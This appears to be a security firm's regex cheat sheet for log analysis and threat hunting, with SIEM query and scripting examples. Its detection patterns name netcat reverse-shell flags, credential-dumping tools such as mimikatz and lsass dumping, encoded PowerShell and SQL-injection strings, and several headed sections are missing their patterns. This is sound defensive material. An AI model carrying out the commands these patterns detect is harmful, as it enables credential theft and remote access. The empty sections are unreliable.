Regex Cheat Sheet: Complete Regular Expression Reference Guide 2026

subrosa Security Team

January 28, 2026

Regular expressions (regex) are essential tools for cybersecurity professionals, enabling powerful pattern matching and text manipulation across SIEM platforms, log analysis systems, incident response workflows, and security automation. This comprehensive regex cheat sheet provides practical examples and patterns specifically designed for security operations, threat hunting, and digital forensics investigations.

What is Regex (Regular Expressions)?

Regular expressions (regex) are sequences of characters that define search patterns, used for pattern matching, text parsing, data validation, and string manipulation. In cybersecurity, regex enables SOC analysts to quickly search through massive volumes of security logs, identify indicators of compromise, detect anomalies, and automate threat detection across diverse data sources.

Why Security Professionals Need Regex:

Log analysis: Parse millions of security events to find specific patterns
Threat hunting: Search for IOCs (indicators of compromise) across log sources
SIEM queries: Write efficient detection rules in Microsoft Sentinel, Splunk, Elastic
Incident response: Extract relevant data during investigations
Automation: Build scripts for security workflows and response actions
Data validation: Ensure input meets security requirements

Basic Regex Syntax

Character Matchers

Pattern	Description	Security Example
`.`	Matches any single character except newline	`error.log` matches "error1log", "errorAlog"
`\d`	Matches any digit (0-9)	`port \d+` finds "port 443", "port 8080"
`\D`	Matches any non-digit	`\D+` extracts text between numbers
`\w`	Matches word characters (letters, digits, underscore)	`\w+@\w+\.com` matches simple emails
`\W`	Matches non-word characters	Useful for finding special characters in logs
`\s`	Matches whitespace (space, tab, newline)	`Failed\s+login` matches "Failed login"
`\S`	Matches non-whitespace	`\S+` extracts tokens without spaces

Quantifiers

Pattern	Description	Security Example
`*`	Matches 0 or more times	`error.*` matches "error", "error: timeout"
`+`	Matches 1 or more times	`\d+` matches "123", "4567" but not empty
`?`	Matches 0 or 1 time (optional)	`https?://` matches "http://" or "https://"
`{n}`	Matches exactly n times	`\d{4}` matches 4-digit years "2026"
`{n,}`	Matches n or more times	`[A-Z]{3,}` matches 3+ uppercase letters
`{n,m}`	Matches between n and m times	`\d{2,4}` matches 2-4 digit numbers
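The character matchers and quantifiers above can be tried out in Python's re module. This is a minimal sketch; the log line is invented for illustration and does not come from a real system.

```python
import re

# Hypothetical log line, invented for this example.
line = "Failed   login for admin on port 8080 via http://intranet.test"

ports = re.findall(r"port \d+", line)          # + : one or more digits
schemes = re.findall(r"https?://", line)       # ? : the "s" is optional
spaced = re.search(r"Failed\s+login", line)    # \s+ : any run of whitespace
four_digit = re.findall(r"\b\d{4}\b", line)    # {4} : exactly four digits

print(ports, schemes, spaced.group(0), four_digit)
```

Note that `\s+` absorbs the three spaces between "Failed" and "login", which a literal single space in the pattern would miss.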

Anchors and Boundaries

Pattern	Description	Security Example
`^`	Matches start of line/string	`^ERROR` finds lines starting with "ERROR"
`$`	Matches end of line/string	`\.exe$` finds lines ending with ".exe"
`\b`	Word boundary	`\broot\b` matches "root" but not "groot"
`\B`	Non-word boundary	`\Broot\B` matches "root" inside "groots" but not standalone "root"
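A short Python sketch of how anchors and boundaries behave, assuming a small made-up three-line log. The offsets are character positions within that sample string.

```python
import re

# Hypothetical three-line log, invented for this example.
log = "ERROR root login\ngroots ok\nrun cmd.exe"

# ^ with re.MULTILINE anchors at the start of each line.
starts_with_error = re.findall(r"^ERROR", log, flags=re.MULTILINE)

# $ with re.MULTILINE anchors at the end of each line.
ends_with_exe = re.findall(r"^.*\.exe$", log, flags=re.MULTILINE)

# \b needs a word boundary on both sides: only the standalone "root".
whole_word = [m.start() for m in re.finditer(r"\broot\b", log)]

# \B needs the absence of a boundary: only the "root" embedded in "groots".
embedded = [m.start() for m in re.finditer(r"\Broot\B", log)]

print(starts_with_error, ends_with_exe, whole_word, embedded)
```

Without `re.MULTILINE`, `^` and `$` in Python only anchor at the start and end of the whole string, which matters when a log file is read in one piece.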

Cybersecurity-Specific Regex Patterns

IP Address Patterns

Basic IPv4:

\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b

Matches: 192.168.1.1, 10.0.0.1, 255.255.255.255 (and also out-of-range values such as 999.999.999.999)

Strict IPv4 (validates 0-255 range):

\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b

IPv6 (simplified; expects seven colons, so most `::`-compressed addresses such as ::1 are not matched):

([0-9a-fA-F]{0,4}:){7}[0-9a-fA-F]{0,4}
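The difference between the basic and strict IPv4 patterns can be checked with a quick Python comparison. This is a sketch only; the sample string and the constant names are assumptions made for the example.

```python
import re

# The two IPv4 patterns from this section, pre-compiled.
BASIC_IPV4 = re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b")
STRICT_IPV4 = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
    r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
)

# Hypothetical log fragment; the last value is not a valid address.
sample = "src=192.168.1.1 dst=10.0.0.1 bogus=999.300.1.1"

basic_hits = BASIC_IPV4.findall(sample)    # includes the bogus value
strict_hits = STRICT_IPV4.findall(sample)  # valid octets only

print(basic_hits)
print(strict_hits)
```

The basic pattern is usually enough for extraction from trusted log formats; the strict one is the safer choice when the result feeds validation or blocking logic.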

Email Address Patterns

Basic Email:

[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}

Advanced Email (RFC compliant):

(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])

URL Patterns

Basic URL:

https?://[^\s]+

Complete URL with validation:

https?://(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&//=]*)

Suspicious URL patterns (phishing detection):

https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://.*\.(?:tk|ml|ga|cf|gq)\b
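As a rough illustration, the suspicious-URL pattern can be applied to a list of URLs in Python. The URLs below are invented, and the last check shows a false positive that the pattern as written may produce.

```python
import re

# Suspicious-URL pattern from this section: raw-IP hosts or selected TLDs.
SUSPICIOUS_URL = re.compile(
    r"https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://.*\.(?:tk|ml|ga|cf|gq)\b"
)

# Hypothetical URLs, invented for this example.
urls = [
    "http://203.0.113.9/login",
    "https://secure-update.example.tk/verify",
    "https://www.example.com/docs",
]

flagged = [u for u in urls if SUSPICIOUS_URL.search(u)]

# Because .* can run past the host name, a path ending in ".ml" also matches.
path_false_positive = bool(SUSPICIOUS_URL.search("https://example.com/a.ml"))

print(flagged, path_false_positive)
```

If that false positive matters, one option is to replace `.*` with `[^\s/]*` so the TLD check stays within the host portion of the URL.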

File Path Patterns

Windows paths:

[a-zA-Z]:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*

Matches: C:\Windows\System32\cmd.exe

Linux paths:

\/(?:[^\/\s]+\/)*[^\/\s]+

Matches: /var/log/auth.log

Suspicious temp file execution:

[a-zA-Z]:\\(?:Windows\\Temp|Users\\[^\\]+\\AppData\\Local\\Temp)\\.*\.exe

Hash Patterns (IOC Detection)

MD5:

\b[a-fA-F0-9]{32}\b

SHA1:

\b[a-fA-F0-9]{40}\b

SHA256:

\b[a-fA-F0-9]{64}\b
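A minimal Python sketch of how the three hash patterns might be used together to pull IOCs out of free text. The function name `extract_hashes` and the sample report are hypothetical, and the hash values are synthetic strings of the right length rather than real digests.

```python
import re

# Hash patterns from this section, keyed by hash type.
HASH_PATTERNS = {
    "md5": re.compile(r"\b[a-fA-F0-9]{32}\b"),
    "sha1": re.compile(r"\b[a-fA-F0-9]{40}\b"),
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
}

def extract_hashes(text):
    """Return {hash_type: [matches]} for every pattern with at least one hit."""
    found = {}
    for name, pattern in HASH_PATTERNS.items():
        hits = pattern.findall(text)
        if hits:
            found[name] = hits
    return found

# Synthetic values: 32 and 64 hex characters respectively.
report = "dropper md5=" + "a1" * 16 + " payload sha256=" + "0f" * 32
result = extract_hashes(report)
print(result)
```

The `\b` on both sides is what keeps the 32-character pattern from matching the first half of a SHA256 value.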

Authentication Patterns

Failed login attempts:

Privilege escalation:

Account lockout:

(?i)account.*(?:locked|disabled|suspended)

Malicious Command Patterns

PowerShell obfuscation:

powershell.*(?:-e|-enc|-encodedcommand|-w\s+hidden)

Command and Control (C2) indicators:

Suspicious network commands:

(?:netcat|nc|ncat).*(?:-e|-c\s+[/\\]bin[/\\](?:bash|sh))
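The two command patterns shown in this section could be applied to process command lines roughly as follows. This is a sketch under assumptions: the rule names, the `match_rules` helper, and the sample command lines are all invented for illustration.

```python
import re

# Patterns copied from this section; the rule names are hypothetical labels.
COMMAND_RULES = {
    "powershell_obfuscation": re.compile(
        r"powershell.*(?:-e|-enc|-encodedcommand|-w\s+hidden)"
    ),
    "netcat_shell": re.compile(
        r"(?:netcat|nc|ncat).*(?:-e|-c\s+[/\\]bin[/\\](?:bash|sh))"
    ),
}

def match_rules(command_line):
    """Return the names of all rules whose pattern appears in the command line."""
    return [name for name, rx in COMMAND_RULES.items() if rx.search(command_line)]

# Hypothetical command lines, invented for this example.
samples = [
    "powershell.exe -nop -w hidden -file update.ps1",
    "nc 10.0.0.5 4444 -e /bin/sh",
    "ping -n 1 10.0.0.5",
]
results = {cmd: match_rules(cmd) for cmd in samples}
print(results)
```

Because `nc` is unanchored, a benign line such as `rsync -e ssh` also satisfies the netcat pattern; adding `\b` around the tool names is one way to reduce that noise.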

Regex in SIEM Platforms

Microsoft Sentinel (KQL) Regex Examples

Find suspicious process execution:

SecurityEvent
| where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe'

Detect potential phishing emails:

EmailEvents
| where Subject matches regex '(?i)(urgent|action required|verify account|suspended)'

Identify lateral movement:

SecurityEvent
| where EventID == 4624
| where LogonType == 3
| where Account matches regex '.*\\\\admin.*'

Splunk Regex Examples

Extract failed SSH attempts:

source="/var/log/auth.log" "Failed password"
| rex field=_raw "Failed password for (?<user>\w+) from (?<src_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"

Parse Windows Security logs:

source="WinEventLog:Security" EventCode=4625
| rex field=Message "Account Name:\s+(?<failed_account>\S+)"

Advanced Regex Techniques

Lookahead and Lookbehind

Pattern	Description	Example
`(?=...)`	Positive lookahead	`password(?=\d)` matches "password" only if followed by digit
`(?!...)`	Negative lookahead	`user(?!admin)` matches "user" not followed by "admin"
`(?<=...)`	Positive lookbehind	`(?<=admin:)\w+` matches username after "admin:"
`(?<!...)`	Negative lookbehind	`(?<!Failed )login` matches "login" only when not preceded by "Failed "
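The four lookaround forms can be exercised in Python as a quick sanity check. The strings are invented for the example, and the negative-lookbehind case uses an illustrative pattern, `(?<!Failed )login`, chosen for this sketch.

```python
import re

# Positive lookahead: "password" only when a digit follows.
digit_follows = [m.start() for m in re.finditer(r"password(?=\d)", "password7 password")]

# Negative lookahead: "user..." tokens where "admin" does not follow "user".
not_admin = re.findall(r"user(?!admin)\w*", "user1 useradmin userx")

# Positive lookbehind: the word that comes right after "admin:".
after_admin = re.findall(r"(?<=admin:)\w+", "admin:jsmith user1")

# Negative lookbehind: "login" that is not preceded by "Failed ".
unprefixed_login = [m.start() for m in re.finditer(r"(?<!Failed )login", "Failed login; login ok")]

print(digit_follows, not_admin, after_admin, unprefixed_login)
```

Lookarounds check context without consuming it, so the matched text never includes the digit, the "admin:" prefix, or the "Failed " prefix. Python's re module requires lookbehind patterns to have a fixed width.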

Groups and Capturing

Pattern	Description	Security Use Case
`(...)`	Capturing group	Extract specific fields from logs
`(?:...)`	Non-capturing group	Group patterns without storing a capture
`(?<name>...)`	Named capturing group	`(?<ip>\d+\.\d+\.\d+\.\d+)` names the capture
`\1, \2`	Backreference	`(\w+)\s+\1` finds repeated words
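Named groups and backreferences might look like this in Python. Note that Python's re module writes named groups as `(?P<name>...)` rather than `(?<name>...)`. The log line is a made-up sshd-style entry, and `SSH_FAIL` is a name chosen for the example.

```python
import re

# Named groups: Python spells them (?P<name>...).
SSH_FAIL = re.compile(
    r"Failed password for (?P<user>\w+) from (?P<src_ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Hypothetical sshd-style log line, invented for this example.
line = "Jan 28 10:15:02 host sshd[991]: Failed password for root from 203.0.113.7 port 52144 ssh2"

match = SSH_FAIL.search(line)
fields = match.groupdict() if match else {}

# Backreference: \1 must repeat whatever group 1 captured.
repeated = re.findall(r"\b(\w+)\s+\1\b", "login login failed failed ok")

print(fields, repeated)
```

`groupdict()` returns the named captures as a dictionary, which is convenient when the extracted fields are passed on to other tooling.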

Common Regex Flags

Flag	Description	Security Application
`i`	Case insensitive	Match "ERROR", "error", "Error" equally
`m`	Multiline (^ and $ match line breaks)	Parse multi-line log entries
`s`	Dotall (. matches newlines)	Search across multiple log lines
`g`	Global (find all matches)	Extract all IPs from text
`x`	Extended (ignore whitespace, allow comments)	Write readable complex patterns
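Flag support varies by engine. As one illustration, Python's re module exposes `i`, `m`, `s`, and `x` as constants and has no `g` flag, because `findall` and `finditer` already return every match. A small sketch with an invented log:

```python
import re

# Hypothetical three-line log, invented for this example.
log = "error: disk full\nERROR: auth failed\nWarning: ok"

# i + m: case-insensitive match at the start of every line.
line_starts = re.findall(r"^error", log, re.IGNORECASE | re.MULTILINE)

# Without s, the dot stops at the newline, so nothing matches.
single_line = re.search(r"disk.*auth", log)

# With s (DOTALL), the dot crosses the line break.
across_lines = re.search(r"disk.*auth", log, re.DOTALL)

# x (VERBOSE): whitespace is ignored and comments are allowed in the pattern.
VERBOSE_IP = re.compile(r"""
    \b
    (?:\d{1,3}\.){3}   # three dot-terminated octets
    \d{1,3}            # final octet
    \b
""", re.VERBOSE)
ips = VERBOSE_IP.findall("from 10.0.0.1 to 10.0.0.2")

print(line_starts, single_line, across_lines.group(0), ips)
```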

Regex Performance Tips for Security Operations

Optimization Best Practices:

Use anchors: Start patterns with ^ when the match must begin at the start of the line, so the engine does not retry at every position
Be specific: Use \d instead of . when you only need digits
Avoid catastrophic backtracking: Don't use nested quantifiers like (a+)+
Use non-capturing groups: (?:...) when you don't need to extract data
Compile patterns: Pre-compile frequently used regex in scripts
Limit scope: Use boundaries \b to prevent unnecessary matching
Test performance: Benchmark regex on sample logs before production use
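Several of these tips can be combined in a short Python sketch: the pattern is compiled once, anchored at the start of the line, uses `\d` rather than `.` for the port, and relies on `\b` to limit matching. The function name, pattern name, and log lines are assumptions for illustration.

```python
import re

# Compiled once at import time and reused for every line.
ERROR_PORT = re.compile(r"^ERROR\b.*\bport (\d{1,5})\b")

def ports_from_errors(lines):
    """Collect port numbers from lines that start with ERROR."""
    ports = []
    for line in lines:
        # match() only tries at position 0, which suits an anchored pattern.
        m = ERROR_PORT.match(line)
        if m:
            ports.append(m.group(1))
    return ports

# Hypothetical log lines, invented for this example.
lines = [
    "ERROR conn refused port 8080",
    "INFO port 22 open",
    "ERROR timeout",
]
found = ports_from_errors(lines)
print(found)
```

For the backtracking tip, a nested quantifier such as `(a+)+` can usually be rewritten as a single `a+` with the same matches and no exponential worst case.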

Practical Threat Hunting Regex Examples

Detect Credential Dumping

(?i)(mimikatz|lsadump|sekurlsa|logonpasswords|procdump.*lsass)

Identifies tools and commands associated with credential theft

Find Ransomware Indicators

Matches common ransomware file extensions and ransom notes

Identify Data Exfiltration

Detects commands uploading data to cloud services

Detect Persistence Mechanisms

(?i)(?:HKLM|HKCU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?

Finds registry keys commonly used for persistence

Find SQL Injection Attempts

(?i)(\bunion\b.*\bselect\b|\bor\b.*1\s*=\s*1|'.*--|\bexec\s*\()

Identifies common SQL injection patterns in web logs
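As a rough sketch, hunting patterns like these can be grouped into a small rule table and run over events in Python. The rule names, the `triage` helper, and the sample events are hypothetical; the two patterns are the credential dumping and SQL injection expressions from this section.

```python
import re

# Two patterns from this section, keyed by hypothetical rule names.
HUNT_RULES = {
    "credential_dumping": re.compile(
        r"(?i)(mimikatz|lsadump|sekurlsa|logonpasswords|procdump.*lsass)"
    ),
    "sql_injection": re.compile(
        r"(?i)(\bunion\b.*\bselect\b|\bor\b.*1\s*=\s*1|'.*--|\bexec\s*\()"
    ),
}

def triage(events):
    """Return (event_index, rule_name) for every rule that fires on an event."""
    hits = []
    for index, event in enumerate(events):
        for name, pattern in HUNT_RULES.items():
            if pattern.search(event):
                hits.append((index, name))
    return hits

# Hypothetical events, invented for this example.
events = [
    "procdump.exe -ma lsass.exe out.dmp",
    "GET /items?id=1 UNION SELECT user,pass FROM accounts",
    "GET /index.html",
]
hits = triage(events)
print(hits)
```

Keyword-style rules like these tend to be noisy on real data, so treating a hit as a lead for review rather than a verdict is a reasonable default.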

Testing and Debugging Regex

Recommended Regex Testing Tools:

Regex101.com: Excellent for testing with explanations and performance metrics
RegExr.com: Interactive testing with community patterns
RegexBuddy: Desktop application for complex pattern development
Python re module: Test patterns in your security scripts
Online Regex Testers: Quick validation before SIEM deployment

Common Regex Mistakes in Security Operations

Mistake	Problem	Solution
Greedy matching	`.*` matches too much	Use lazy `.*?` or specific patterns
Missing escapes	. matches any character	Escape special chars: `\.`
No anchors	Pattern matches anywhere	Use ^ and $ for specific positions
Inefficient patterns	Slow query performance	Optimize with specific character classes
Forgetting flags	Case-sensitive when shouldn't be	Add (?i) or /i flag for case-insensitive
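Two of the mistakes in the table, greedy matching and missing escapes, are easy to reproduce in Python. The key-value line below is invented for the example.

```python
import re

# Hypothetical key-value log line, invented for this example.
line = 'user="alice" action="login" result="fail"'

# Greedy .* runs to the last quote on the line.
greedy = re.findall(r'"(.*)"', line)

# Lazy .*? stops at the first closing quote.
lazy = re.findall(r'"(.*?)"', line)

# A specific character class gives the same result without backtracking tricks.
specific = re.findall(r'"([^"]*)"', line)

# An unescaped dot matches any character, so "cmdXexe" slips through.
unescaped = bool(re.search(r"cmd.exe", "cmdXexe"))
escaped = bool(re.search(r"cmd\.exe", "cmdXexe"))

print(greedy, lazy, specific, unescaped, escaped)
```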

Regex in Security Automation Scripts

Python Example: Extract IPs from Logs

import re

# Read the security log
with open('firewall.log', 'r') as f:
    content = f.read()

# Extract all IPv4-looking strings (basic pattern; does not validate the 0-255 range)
ip_pattern = r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
ips = re.findall(ip_pattern, content)

# Count unique IPs
unique_ips = set(ips)
print(f"Found {len(unique_ips)} unique IP addresses")

PowerShell Example: Parse Windows Event Logs

Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4625]]" |
    Select-Object -First 100 |
    Where-Object { $_.Message -match 'Account Name:\s+(?<user>\S+)' } |
    Select-Object TimeCreated, @{N='User'; E={$Matches.user}}

Frequently Asked Questions

What is regex used for in cybersecurity?

Regex in cybersecurity is used for log analysis, threat detection, pattern matching in SIEM tools, parsing security events, validating input, detecting malicious patterns, analyzing network traffic, and automating incident response workflows. SOC analysts use regex daily to search through vast amounts of log data for indicators of compromise, suspicious activity, and security anomalies.

What does .* mean in regex?

In regex, .* means match any character except a newline (the dot .) zero or more times (the asterisk *). This creates a wildcard that matches any run of characters on a line, including the empty string. For example, 'error.*failure' matches 'error: system failure', 'error connection failure', or just 'errorfailure'. In security contexts, .* is commonly used in log queries to find events with specific keywords regardless of what appears between them, though it should be used carefully to avoid performance issues.

How do I match an IP address with regex?

To match an IP address with regex, use: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b for a basic pattern that matches any number sequence in IP format, or \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b for strict validation that ensures each octet is between 0-255. This pattern is essential for security log analysis, identifying source/destination IPs in firewall logs, detecting suspicious connection patterns in network traffic, and extracting IPs during forensic investigations.

What is the difference between * and + in regex?

In regex, * (asterisk) matches zero or more occurrences, while + (plus) matches one or more occurrences. For example: 'a*' matches '', 'a', 'aa', 'aaa' (including empty string), but 'a+' only matches 'a', 'aa', 'aaa' (requires at least one 'a'). In security contexts, use + when you need to ensure a pattern appears at least once, such as when searching for actual error messages (ERROR.+) rather than empty fields, or when extracting usernames that must contain at least one character (\w+).
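The difference is easy to confirm in Python. In this small sketch, the `user=` strings are invented for illustration.

```python
import re

# * accepts the empty string; + does not.
star_matches_empty = re.fullmatch(r"a*", "") is not None
plus_matches_empty = re.fullmatch(r"a+", "") is not None

# With *, an empty username field still produces a (blank) capture.
with_star = re.findall(r"user=(\w*)", "user= user=bob")

# With +, only fields that contain at least one character are returned.
with_plus = re.findall(r"user=(\w+)", "user= user=bob")

print(star_matches_empty, plus_matches_empty, with_star, with_plus)
```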

How do I use regex in Microsoft Sentinel?

In Microsoft Sentinel, use regex with the "matches regex" operator in KQL (Kusto Query Language). Example: SecurityEvent | where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe' searches for suspicious executables running from Windows temp folders. Regex in Sentinel enables advanced threat hunting, log parsing, custom detection rules, and correlation of security events across your environment. You can also use the extract() function or the parse operator with regex patterns for detailed log field extraction.

Conclusion: Master Regex for Security Operations

Regular expressions are indispensable tools for modern cybersecurity professionals. Whether you're a SOC analyst hunting threats in Microsoft Sentinel, a forensic investigator parsing evidence, or a security engineer building detection rules, mastering regex dramatically increases your efficiency and effectiveness.

This cheat sheet provides patterns and techniques specifically designed for security operations, but regex mastery comes through practice. Start with simple patterns, test thoroughly, and gradually build more complex expressions as your skills develop. Remember to optimize for performance: inefficient regex can slow SIEM queries and analysis during critical incident response situations.

subrosa's SOC team uses advanced regex patterns daily in Microsoft Sentinel for threat detection, log analysis, and automated response. Contact us to learn how our security experts can help optimize your detection rules and threat hunting workflows.
